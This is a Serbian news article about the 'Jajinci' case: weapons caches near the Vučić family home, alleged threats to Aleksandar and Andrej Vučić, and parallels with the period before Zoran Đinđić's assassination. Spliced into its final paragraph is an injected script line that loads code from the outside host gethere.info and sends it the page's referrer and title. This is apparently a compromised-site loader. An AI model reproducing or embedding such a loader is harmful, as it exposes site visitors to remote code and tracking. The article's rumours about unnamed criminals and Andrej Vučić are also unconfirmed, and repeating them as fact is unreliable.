SLUČAJ “JAJINCI”: Poslednja opomena za Andreja Vučića

SLUČAJ “JAJINCI”: Poslednja opomena za Andreja Vučića

(BETAPHOTO/BRANISLAV BOZIC/AV)


Ako nije istina ovo što se o mlađem Vučiću još uvek samo prenosi od usta do usta, onda je zaključak da se od njega tendenciozno pravi kriminalac, koji bi mogao da strada u jednom takvom okršaju. Time bi se opravdala njegova smrt, a starijem bratu zadao bi se udarac od koga bi poklekao. Ne samo fizički, već i politički

Ko preti Vučićima? Da li je u toku ubijanje Aleksandra i Andreja, poslednji čin? Zbog čega je, prema izjavama policijskih zvaničnika, meta pre mlađi Andrej nego stariji, predsednik Vlade? Odgovora na ova pitanja, uglavnom, nema. Pronađeni su arsenali oružja na dve lokacije, u jednoj garaži na Novom Beogradu i u blizini porodične kuće u Jajincima, u prečniku od jednog kilometra, a na osnovu analize baznih stanica mobilnih telefona, u Jajincima je registrovano prisustvo 97 obaveštajno interesantnih lica, “pucača”, kako se izrazio ministar policije.

Još uvek nezvanične informacije bezbednosnih službi upućuju na osobu iz crnogorskog podzemlja, narko-dilera na čijem se platnom spisku, pored nekih policajca i tužilaca, navodno nalazi čak i jedan visoki crkveni zvaničnik. Čovek u čijem dosijeu piše da je umešan u brojne krvave obračune u Srbiji i Crnoj Gori, a izvođači radova na poziv uglavnom mu dolaze preko Drine. Povezan sa stranim službama, prebogat, umešan u smrt vođe navijača Saleta Mutavog. Prezime mu počinje na D, a dovodi se i u kontekst pretnji Vučićima.

Ministar policije izjavio je na televiziji da su braća Vučić jedan drugom slaba tačka, da su kao sijamski blizanci, iako je razlika između njih dvojice dve godine. Ovom izjavom iznenadio je običan svet, ali ne i one koji se profesionalno bave braćom Vučić, od kriminalaca do stranih službi.

A mogući dokaz za to jeste da kako je stariji Aleksandar jačao u politici, da je, s druge strane, mlađi Andrej sve više i dublje u određenim krugovima dovođen u kontekst nekih kriminalnih radnji, od švercera lakih i teških droga do trgovca oružjem na crno… Pokušalo se otići čak i do toga da on ima veze i sa smrću pomenutog vođe navijača.

FOTO:NEMANJA JOVANOVIC

FOTO:NEMANJA JOVANOVIC

Vučić stariji zabranio je da zvaničnici u narednom periodu daju bilo kakve izjave na temu mogućeg napada na njega i njegovog brata. Valjda se i njemu smučilo to što su se utrkivali ko će više toga potresnog i dramatičnog da kaže

Ako ovo o mlađem Vučiću nije istina, što se još uvek samo prenosi od usta do usta, onda je zaključak da se od njega tendenciozno pravi kriminalac, koji bi mogao da strada u jednom takvom okršaju. Time bi se opravdala njegova smrt, a starijem bratu zadao bi se udarac od koga bi poklekao. Ne samo fizički, već i politički. I to verovatno ne bi ohrabrilo samo političke protivnike, kao i određeni broj osoba iz njegovog partijskog okruženja, već i strani obaveštajni faktor, kome je suzio manevarski prostor.

Domaći analitičari i stručnjaci za bezbednost o događajima vezanim za Vučiće uglavnom povlače paralele sa situacijom koja je vladala pred kraj 2002. i prvi deo 2003. godine. To je period kada je tadašnji predsednik vlade Zoran Đinđić dovođen u vezu sa kriminalom. Iz tog perioda najžešća je bila “duvanska afera”, u kojoj su najbliži Zoranovi saradnici predstavljani u javnosti kao organizatori šverca cigareta.

Čak je u skupštini formiran i anketni odbor kako bi se utvrdila osnovanost navoda u štampi o organizovanom švercu cigareta u Srbiji. Afera, proizvedena u Hrvatskoj, naglo je zaustavljena kada je jedan srpski nedeljnik objavio transkripte prisluškivanih razgovora tadašnjeg vođe zagrebačkog podzemlja. Đinđićevi bliski saradnici su pred domaćim i stranim sudovima oslobođeni optužbi za organizovani šverc duvana, mnogo godina nakon što je 12. marta pred zgradom vlade Zoran ubijen.

Vučić stariji zabranio je u ponedeljak uveče da zvaničnici u narednom periodu daju bilo kakve izjave na temu mogućeg napada na njega i njegovog brata. Valjda se i njemu smučilo to što su se utrkivali ko će više toga potresnog i dramatičnog da kaže, a izgledalo je kao da im je mnogo više bilo stalo da njemu samom dokažu kako brinu nego da informišu javnost o tome šta se stvarno događa. Neki su u izjavama otišli toliko daleko da su već odbijali funkcije na kojima bi mogli da se nađu ako se Aleksandru nešto dogodi. Pozdravio ih Frojd.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

+ Trenutno nema komentara

Dodajte Vaš komentar